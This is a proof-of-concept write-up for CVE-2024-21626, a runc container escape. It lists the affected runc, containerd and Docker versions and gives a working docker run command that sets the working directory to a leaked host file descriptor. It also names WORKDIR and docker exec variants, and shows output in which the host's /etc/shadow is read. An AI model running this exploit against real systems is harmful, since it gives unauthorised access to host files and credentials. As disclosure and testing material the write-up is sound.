CVE-2024-21626
runc, the low-level container runtime used by Docker and containerd, released version 1.1.12 on 31 January 2024 to fix CVE-2024-21626, a container escape. During container setup runc leaks a file descriptor that is open on the host's /sys/fs/cgroup; a process whose working directory is set to /proc/self/fd/<fd> before that descriptor is closed ends up with a host directory as its cwd, from which the host filesystem can be reached with a relative path.
Affected Versions
- runC v1.0.0-rc93 - 1.1.11
- containerd 1.4.7 - 1.6.27 and 1.7.0 - 1.7.12
- Docker <=25.0.1
Proof of Concept
Prerequisites
- The user must be able to start containers (for example, a member of the docker group)
- The Docker daemon must be backed by a vulnerable runc version (1.0.0-rc93 through 1.1.11)
Exploitation Method
Start a new container with the working directory set to /proc/self/fd/<fd>, where <fd> is the file descriptor runc leaves open on the host's /sys/fs/cgroup (typically 7 or 8; if one number fails, try the neighbouring ones). The same effect can be obtained from a malicious image's WORKDIR or from `docker exec -w`, since all of these end up as the process cwd handed to runc.
docker run -w /proc/self/fd/8 --name cve-2024-21626 --rm -it debian:bookworm
Example Output
Once exploited, the container's working directory is on the host filesystem. The `getcwd` error from `pwd` is the telltale sign: the cwd lies outside the container's root, and `../../..` from /sys/fs/cgroup resolves to the host's `/`:
root@7185badc969c:../../..# pwd
pwd: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
root@7185badc969c:../../..# ls -al
total 88
drwxr-xr-x 19 root root 4096 Oct 31 11:20 .
drwxr-xr-x 19 root root 4096 Oct 31 11:20 ..
...
drwxr-xr-x 199 root root 12288 Jan 26 11:22 etc
...
root@7185badc969c:../../..# cat etc/shadow
user:$y$ZZZ$XXXX:19661:0:99999:7:::
The vulnerability allows reading sensitive host files such as /etc/shadow from within the container.